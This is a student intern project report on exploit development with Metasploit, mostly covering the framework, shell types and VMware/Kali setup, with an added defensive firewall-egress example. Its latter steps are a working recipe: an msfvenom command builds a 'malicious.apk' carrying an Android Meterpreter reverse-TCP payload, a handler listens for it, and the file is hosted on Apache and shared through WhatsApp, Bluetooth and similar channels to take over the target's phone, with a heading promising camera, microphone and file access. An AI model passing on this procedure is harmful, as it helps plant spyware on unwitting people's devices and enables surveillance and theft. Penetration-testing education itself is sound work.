
aivolved report

The document outlines a project report on exploit development using the Metasploit Framework, focusing on exploiting Android devices, Windows, and Linux machines. It details the responsibilities, goals, and methodologies involved in using Metasploit for vulnerability assessment, exploit development, and penetration testing. The report also discusses the framework's features, commands, and installation requirements, alongside challenges faced during the project.

Uploaded by

Amruth RB

PROJECT REPORT ON

Exploit Development: Metasploit

RAMAIAH POLYTECHNIC Aivolved Technologies Pvt Ltd

Submitted By :
1. Adithya V
2. Amruth RB
3. Bhagavathy Raj V
4. BM Anand
5. Hemanth KS
6. Swastik Shetty
7. Vishal Kerur
Role:
As a group, our assigned role was to work on exploiting Android devices using the
Metasploit Framework with the help of Kali Linux.

Project Overview:
Our job as a group of interns was to try to exploit Android devices, but as we
progressed, we were also assigned the task of trying to access a Windows machine and a
Linux machine.

Responsibilities:
• Developing and implementing the Metasploit Framework for accessing the target’s
  device
• Working with modules like auxiliary, encoders, exploits, nops, payloads, and post

Goal:
The goal is to enhance understanding and proficiency in exploit development,
enabling security professionals to effectively assess them
1. Vulnerability Assessment:
   • Identify and assess vulnerabilities in computer systems and networks to
     understand potential points of exploitation.
2. Exploit Development:
   • Develop, test, and deploy exploits for known vulnerabilities. This helps
     security professionals understand the impact of vulnerabilities and assists
     in creating mitigation strategies.
3. Penetration Testing:
   • Conduct simulated attacks on systems and networks to evaluate their
     security posture. This involves attempting to exploit vulnerabilities in a
     controlled environment to identify weaknesses.
4. Education and Training:
   • Serve as an educational tool for learning about penetration testing, ethical
     hacking, and cybersecurity.

Abstract: Metasploit is the world’s leading open-source penetration testing framework,
used by security engineers both as a penetration testing system and as a development
platform for creating security tools and exploits. The framework makes hacking simple
for both attackers and defenders.

The various tools, libraries, user interfaces, and modules of Metasploit allow a user to
configure an exploit module, pair with a payload, point at a target, and launch at the
target system. Metasploit’s large and extensive database houses hundreds of exploits
and several payload options.

The project focuses on providing methods and features for automating the exploit
development using the functions and tools available in the popular Metasploit
framework. Metasploit is a powerful and widely used penetration testing tool that
identifies and exploits vulnerabilities in target systems.

Use case and Purpose: With the wide range of applications and open-source
availability that Metasploit offers, the framework is used by everyone from
professionals in development, security, and operations to hackers.

Metasploit Uses and Benefits: Metasploit supports varied use cases, and its
benefits include:

• Open Source and Actively Developed – Metasploit is preferred to other paid
  penetration testing tools because it allows access to its source code and the
  addition of custom modules.

• Ease of Use – it is easy to use Metasploit while conducting a large network
  penetration test. Metasploit conducts automated tests on all systems in order
  to exploit the vulnerability.

• Easy Switching Between Payloads – the set payload command makes switching
  payloads quick and easy. It becomes easy to change Meterpreter or
  shell-based access into a specific operation.

• Cleaner Exits – Metasploit allows a clean exit from the target system it has
  compromised.

• Friendly GUI Environment – a friendly GUI and third-party interfaces
  facilitate the penetration testing project.

Metasploit Framework: The following is the filesystem of the Metasploit Framework
(MSF):

• Data - contains editable files for storing binaries, wordlists, images,
  templates, logos, etc.

• Tools - contains command utilities including plugins, hardware, memdump

• Scripts - contains Meterpreter scripts and resources to run functionalities

• Modules - contains the actual MSF modules

• Plugins - additional extensions for automating manual tasks

• Documentation - documents and PDFs concerning the Metasploit Framework

• Lib - contains libraries required to run Metasploit from start to end

Metasploit Shell Types

There are two types of shells in Metasploit for attacking or interacting with the
target system.

• Bind Shell - here, the target (victim) machine opens a listener, and the
  attacker then connects to that listener to get a remote shell. This type of
  shell is risky because anyone can connect to the shell and run commands.

• Reverse Shell - here, the listener runs on the attacker's machine, and the
  target system connects back to the attacker to provide the shell. Reverse
  shells can solve problems that are caused by bind shells.
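
Added example (not part of the original report): a small Python model of how a host firewall policy treats the two connection directions described above, and why defenders need egress rules as well as inbound rules. HOST and both policies are constructed for illustration; 192.168.0.3 and port 4444 are the LHOST and LPORT values this report uses.

```python
# Added example: how a host firewall policy treats the two shell directions.
# HOST and both policies are constructed; 192.168.0.3:4444 are the report's LHOST/LPORT.
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional

HOST = "192.168.0.50"  # constructed address of the device being protected

@dataclass(frozen=True)
class Conn:
    initiator: str  # side that opens the TCP connection
    responder: str  # side that was already listening
    dport: int      # port on the responder

@dataclass(frozen=True)
class Policy:
    inbound_allowed: FrozenSet[int]           # ports others may reach on HOST
    egress_allowed: Optional[FrozenSet[int]]  # ports HOST may reach; None = any

def direction(conn: Conn) -> str:
    if conn.responder == HOST:
        return "inbound"    # bind shell: the listener is on the device
    if conn.initiator == HOST:
        return "outbound"   # reverse shell: the device dials out to the listener
    raise ValueError("connection does not involve HOST")

def permits(policy: Policy, conn: Conn) -> bool:
    if direction(conn) == "inbound":
        return conn.dport in policy.inbound_allowed
    return policy.egress_allowed is None or conn.dport in policy.egress_allowed

BIND = Conn(initiator="192.168.0.3", responder=HOST, dport=4444)
REVERSE = Conn(initiator=HOST, responder="192.168.0.3", dport=4444)

INBOUND_ONLY = Policy(frozenset({443}), None)                     # no egress control
WITH_EGRESS = Policy(frozenset({443}), frozenset({53, 80, 443}))  # adds egress allowlist

def evaluate() -> Dict[str, Dict[str, bool]]:
    """Return, per policy, whether each connection would be permitted."""
    conns = {"bind": BIND, "reverse": REVERSE}
    policies = {"inbound_only": INBOUND_ONLY, "with_egress": WITH_EGRESS}
    return {p: {c: permits(pol, conn) for c, conn in conns.items()}
            for p, pol in policies.items()}

if __name__ == "__main__":
    for name, verdicts in evaluate().items():
        print(name, verdicts)
```

The inbound-only policy blocks the bind-shell connection but lets the reverse connection out; only the policy with an egress allowlist blocks both.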
Metasploit Commands

Some basic commands of Metasploit are msfconsole, banner, search, connect, cd,
back, grep, jobs, kill, load, info, show options, set, check, edit, use, exploit, exit, help,
and others.

Requirements
Metasploit is a popular open-source penetration testing framework that helps security
professionals and ethical hackers identify and exploit vulnerabilities in systems. To
effectively use Metasploit, you need to ensure that your system meets certain
specifications.

Here are the basic requirements:

• Operating System: Compatible with Linux, Windows, and macOS, but
  primarily used on Linux distributions like Kali Linux.
• Hardware: Requires at least 2 GB of RAM and a dual-core processor.
• Disk Space: At least 2 GB of free space is recommended.
• Dependencies: Install necessary dependencies, including Ruby, PostgreSQL,
  and other required gems.
• Network Connectivity: Internet access for updates and obtaining new exploit
  modules.
• Database Configuration: Configure a database (preferably PostgreSQL) for
  storing target and exploit information.
• Firewall and Antivirus: Adjust firewall settings and antivirus configurations to
  allow Metasploit operations.
• Installation Steps: Follow official installation instructions for your operating
  system.
• Updates: Regularly update Metasploit using the msfupdate command.
• User Permissions: May require administrative or root privileges.

Methodology
Requirements:
1. A computer or laptop with Kali Linux installed, or a virtual machine such as VMware
   or Oracle VirtualBox if the host OS is Windows
2. A stable Wi-Fi network
3. Install Metasploit Framework if not found (it will be pre-installed in Kali Linux)
4. An Android device or a Windows machine

Information Gathered

Here are some data sources for collecting information regarding Metasploit:
1. Official Sources:
• Metasploit Framework Documentation: The official documentation for Metasploit is a
  comprehensive resource that covers everything from installation and configuration to
  using the framework's various modules and features.
• Metasploit Blog: The Metasploit blog is a great way to stay up-to-date on the
  latest news and developments related to the framework.
• Metasploit Community Forums: The Metasploit community forums are a
  valuable resource for getting help and advice from other Metasploit users.

2. Third-Party Sources:
• Online Courses: There are a number of online courses available that teach you
  how to use Metasploit. These courses can be a great way to learn the framework
  at your own pace.
• Security Blogs and Websites: Many security blogs and websites publish articles
  and tutorials about Metasploit.

Modules

Module 1 (Virtual Machine)

• To download and install the VMware product, visit the official website of
  VMware.
• Click on Free Product Trials & Demo >> Workstation Pro. You will be
  redirected to the download page.
• Once the download is complete, run the .exe to install VMware
  Workstation. A popup will appear.
• Once initialization is complete, click Next.
• Accept the terms and click Next.
• The next screen asks about additional features; it is not mandatory
  to check this box. Click Next.
• At this step, VMware Workstation is ready to install. Click Install.

Module 2 (Installing Kali Linux in VMware)

• Download Kali Linux ISO: Get the ISO image from the official Kali
  Linux website.
• Install VMware: Download and install VMware Workstation Player or
  VMware Workstation Pro.
• Create New Virtual Machine: Use VMware to create a new virtual
  machine, selecting the Kali Linux ISO file as the installation media.
• Specify Guest OS: Choose Linux and the appropriate version (e.g., Debian
  64-bit).
• Name and Location: Give the virtual machine a name and choose where to
  store it.
• Disk Capacity: Set the disk size for the virtual machine.
• Customize Hardware (Optional): Adjust settings like RAM, CPU cores,
  etc., as needed.
• Finish Installation: Review settings and create the virtual machine.
• Start Virtual Machine: Launch the virtual machine from VMware.
• Install Kali Linux: Follow on-screen instructions to install Kali Linux
  within the virtual machine.

1. Open the virtual machine where Kali is installed.

2. Enter the user’s credentials to log in to the system.

3. Open a terminal in Kali.

4. Type “cd Desktop” so that the APK file is created in the Desktop directory.

5. To create an APK with a payload, type the command “msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -o malicious.apk” and press Enter.

6. You have successfully created an Android APK with the payload needed to
   gain access to the target device.

7. To set up the host and target device, set up listeners, and monitor the
   environment, we need a medium. In this case we are using msfconsole.

8. Open a new terminal.

9. In it, type “msfconsole” and press Enter.

10. An interface will open for executing msf commands.

11. We tell it that we'd like to use the generic payload handler, i.e. the
    “multi-handler” module.

12. We need to tell the multi-handler what IP address to listen on. This
    corresponds to the LHOST value we set in our msfvenom command: “set
    LHOST 192.168.0.3”.

13. To set the listener port, type “set LPORT 4444”.

14. To check the assigned parameters, type “show options”.

15. Open a second terminal to set up the server through which the file will be
    accessed. To use the Apache server, type “service apache2 start” and
    press Enter.

16. To check the status of the server, type “service apache2 status”.

17. Change your directory to Desktop by typing “cd Desktop”.

18. Type “ls” to list the contents of the Desktop.

19. Type “sudo cp (filename).apk /var/www/html” to copy the created APK
    into the directory given in the command.

For accessing the Android device through the malicious APK

1. You can share the created APK file in various ways to access the target’s
   phone, for example via WhatsApp, USB transfer, Bluetooth, or Nearby Share.

2. Keep msfconsole up and running and type “run” to access the phone.

3. Install the application and accept the permissions that it requires.

4. Once accepted, a Meterpreter session will be generated for accessing the target
   phone with various commands.

Tutorial for accessing the target’s camera, microphone and file system

These are the commands required for navigating into files and folders in the
phone
Output
The problems we faced during the development
